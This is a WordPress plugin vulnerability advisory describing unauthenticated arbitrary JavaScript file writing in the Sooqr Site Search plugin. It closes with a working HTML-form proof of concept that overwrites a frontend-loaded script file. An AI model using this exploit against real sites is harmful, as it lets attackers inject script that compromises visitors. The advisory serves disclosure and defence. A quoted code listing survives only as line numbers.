That allows the function to be run when accessing an admin page, which doesn’t require that someone be logged in to access it. That is common starting point for vulnerabilities, including exploited vulnerabilities, so any function that runs then is something we check during the security reviews we do of plugins.
When that function runs if the POST input “snippetjs” exists, then what is submitted as its value is saved to the file /wp-content/plugins/sooqr-site-search/public/js/sooqrsearch.js:
976 977 978 979 980 981
If the plugin’s functionality is enabled, that file will be loaded when visiting frontend pages of the website.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.
Proof of Concept
The following proof of concept will save the specified user input to the file /wp-content/plugins/sooqr-site-search/public/js/sooqrsearch.js.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[file contents]” with the contents to be placed in the file.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="snippetjs" value="[file contents]" /> <input type="submit" value="Submit" /> </form> </body> </html>